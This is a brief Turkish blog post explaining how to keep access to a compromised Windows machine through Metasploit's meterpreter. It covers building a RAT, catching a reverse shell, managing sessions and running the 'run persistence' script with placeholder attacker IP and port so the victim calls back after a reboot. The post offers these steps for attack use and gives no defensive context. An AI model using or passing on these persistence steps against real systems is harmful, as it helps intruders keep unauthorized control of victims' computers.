Windows işletim sistemleri ele geçirildikten sonra sisteme tekrardan bağlantı gerçekleştirmek için backdoor yerleştirilmesi gerekmektedir. Peki metasploit üzerinden meterperer satırındayken nasıl backdoor yerleştirme işlemi gerçekleştirilir ?
Aşağıda örnek bir rat oluşturulmuştur, belirtilen port dinlemeye alınarak hedef sistemden reverse shell alınmıştır.
Gelen bağlantı ile meterpreter satırına düşüldükten sonra “backround” komutunu kullanılarak gelen bağlantı arka plana alınır, “sessions” komutu ile “ID” numarasını öğrenilir. Son olarak "sessions -i <ID> ” şeklinde bağlantı yapılır. Meterpreter satırındayken ufak bir script çalıştırlır “run persistence -U<kullanıcı tespiti> i 5<bağlantı saniyesi> -p <saldırgan port> -r <saldırgan ip>” şeklinde yazılırarak çalıştırılır.
Gerekli bütün adımlar görüldüğü üzeri sıkıntısız bir şekilde gerçekleşmiş. Test etmek için hedef sistem shutdown veya restart edilir.
sessions komutu çalıştırdıgımız zaman görüldüğü gibi hiçbir bağlantı yok. Hedef sistem yeniden açıldıktan sonra “run” komutunu kullanarak sisteme tekrardan giriş sağlanır.
0 yorum:
Yorum Gönder